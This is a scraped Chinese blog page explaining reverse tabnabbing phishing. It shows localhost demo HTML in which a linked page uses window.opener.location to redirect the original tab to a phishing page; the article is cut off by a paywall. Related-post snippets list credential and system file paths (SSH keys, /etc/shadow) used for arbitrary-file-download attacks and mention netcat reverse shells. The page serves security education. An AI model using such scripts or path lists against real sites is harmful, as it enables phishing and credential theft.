Reverse Tabnabbing钓鱼

最新推荐文章于 2022-04-05 13:45:17 发布
最新推荐文章于 2022-04-05 13:45:17 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: 渗透杂项
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/104535225
版权

Reverse Tabnabbing钓鱼

  • 希望你以后能过得好,别辜负我一生不打扰

文章目录

原理:

使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open

利用:

创建三个页面A\B\C

A
<html>
<title>正常网站</title>
 <body>
  <li><a href="http://localhost/b.html" target="_blank" >a标签</a></li>
  <button onclick="window.open('http://localhost/b.html')">window.open</button>
 </body>
</html>

B
<html>
<title>恶意网站</title>
 <body>
  <script>
   if (window.opener) {
      window.opener.location = "http://localhost/c.html
最低0.47元/天 解锁文章
SoulCat.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Tabnabbing Fighter:Phishing Attack Protection-crx插件
03-23
保护您免受Tabnabbing网络钓鱼攻击 Tabnabbing战斗机:保护您免受Tabnabbing网络钓鱼攻击! 浏览安全快乐,无需担心标签被打扰! 了解什么是Tabnabbing-Tabnabbing是一种计算机利用和网络钓鱼攻击,通过假冒那些网站并说服用户该网站是真实的,说服用户向流行的网站提交其登录详细信息和密码。 该攻击利用了用户对选项卡的信任和对细节的不重视,并且使浏览器能够在页面加载后很长一段时间内在非活动选项卡中浏览页面的原始位置。 Tabnabbing与大多数网络钓鱼攻击的不同之处在于,用户不再记得某个选项卡是与登录页面无关的链接的结果,因为假冒的登录页面已加载到浏览器中一个长期打开的选项卡中。我们不希望的是,当我们不浏览时,我们一直在浏览的页面会在背后发生变化。 这会让我们感到惊讶。 支持语言:English
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1617
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
浅谈对tabnabbing漏洞的理解和利用
SoporAeternus12的博客
04-05 3873
最近在打vulnhub上的靶机的时候卡在了某个点,后来我去网上搜索相关攻略,发现了一个叫reverse tabnabbing的漏洞,由于我之前并没有学习过这个漏洞,所以写了这篇文章来记录一下对这个漏洞的学习成果。 漏洞原理和介绍 tabnabbing是一种钓鱼攻击漏洞,网上将该漏洞翻译为反向标签劫持攻击,大致原理就是黑客通过某种方法在页面A中植入一个a标签,也就是一个超链接,链接的指向是黑客精心准备的页面B,页面B的内容有一个javascript代码,内容就是window.opener.location=“
metasploit的SET的Credential Harvester Attack Method
天元喜羊羊的博客
05-29 1420
环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器 操作如下: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001
Multi-Attack Web Method
天元喜羊羊的博客
06-29 2260
操作如下: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10
制作钓鱼网站进行渗透测试——内网SET工具包
渗透测试
06-22 1318
set工具包中的web攻击向量,可以克隆出与实际的可信站点看起来一模一样的网页,这使得受害者认为他们正在浏览一个合法的站点。 本例子使用Java Applet攻击向量对用户进行欺骗 以下是具体步骤 setoolkit进入set工具包 _______________________________ / _____/\_ _____/\__ ___/ \_____ \ | __)_ | | /
C++ reverse介绍及使用
10-09
在C++编程语言中,`std::reverse`函数是一个非常实用的工具,它允许程序员轻松地反转各种序列,包括字符串和数组。这个函数是C++标准库中的成员,位于`<algorithm>`头文件中。本篇文章将深入探讨`std::reverse`函数...
Scroll Reverse
12-09
MacOS中鼠标滑轮方向与触控板方向不一致,用Scroll Reverse可以加以调节。第一次使用时可设置成开机自动启动。
什么是reverse常见的reverse有哪些
05-19
reverse
DB2中REVERSE函数的实现方法
09-10
在本话题中,我们将探讨DB2中的`REVERSE`函数,这是一个用于反转字符串顺序的函数。根据描述,虽然Oracle和SQL Server也内置了类似的函数,但它们的参数和返回类型略有不同。 在Oracle中,`REVERSE`函数接受一个`...
python numpy 反转 reverse示例
09-18
今天小编就为大家分享一篇python numpy 反转 reverse示例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Windows/Linux 下nc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
HTTP响应头拆分攻击(又名曰CRLF注入)
SoulCat
06-11 4350
HTTP响应头拆分攻击(又名曰CRLF注入) 最虐不过等不到南康白起35岁,吴邪等不到张起灵。 漏洞概述: CRLF注入攻击是比较新颖的一种Web攻击方式,如Web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞等。主要是由于Web应用程序未对用户提交的数据进行严格过滤和检查,导致攻击者可以提交一些恶意字符如(CR、LF等)然后进行构造恶意代码进行攻击。 基本原理: CR:对应A...
任意文件下载常用路径
SoulCat
09-06 3146
任意文件下载常用路径 所爱隔山海,山海不可平,但海有舟可渡,山有径可行 LINUX: /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_ras.keystore /root/.ssh/known_hosts /etc/passwd /etc/shadow /etc/issue /etc/fstab /etc/host.conf...
黑名单文件上传绕过
SoulCat
10-24 1528
黑名单文件上传绕过 我在西北,一山又一山。与你相隔,一关又一关。 漏洞概述: .htaccess用于Apache .user.ini用于php 漏洞复现: .user.ini 原理: .user.ini将所有php文件自动包含任意木马文件执行。 使用条件: 只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含 上传1.user....
文件上传漏洞之勇闯20层地狱
SoulCat
03-11 720
文件上传漏洞之勇闯20层地狱 有些喜欢,就是麦田里曾降临过的风,只有当事人明了,而这的世界假装没发生。 文章目录文件上传漏洞之勇闯20层地狱简介:pass-01:pass-02:pass-03:pass-04:pass-05:pass-06:pass-06: 简介: upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。 项目地址:https...
SecondactivityMainActivity.java
最新发布
06-24
SecondactivityMainActivity.java
buuctf reverse reverse3
09-27
BUUCTF Reverse Reverse3是一个题目,通过对给定的字符串进行逆运算,解密出一个flag。首先,给出的字符串经过了base64加密和按位加的操作,得到了"e3nifIH9b_C@n@dH"这个结果。要得到flag,我们需要进行逆运算。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值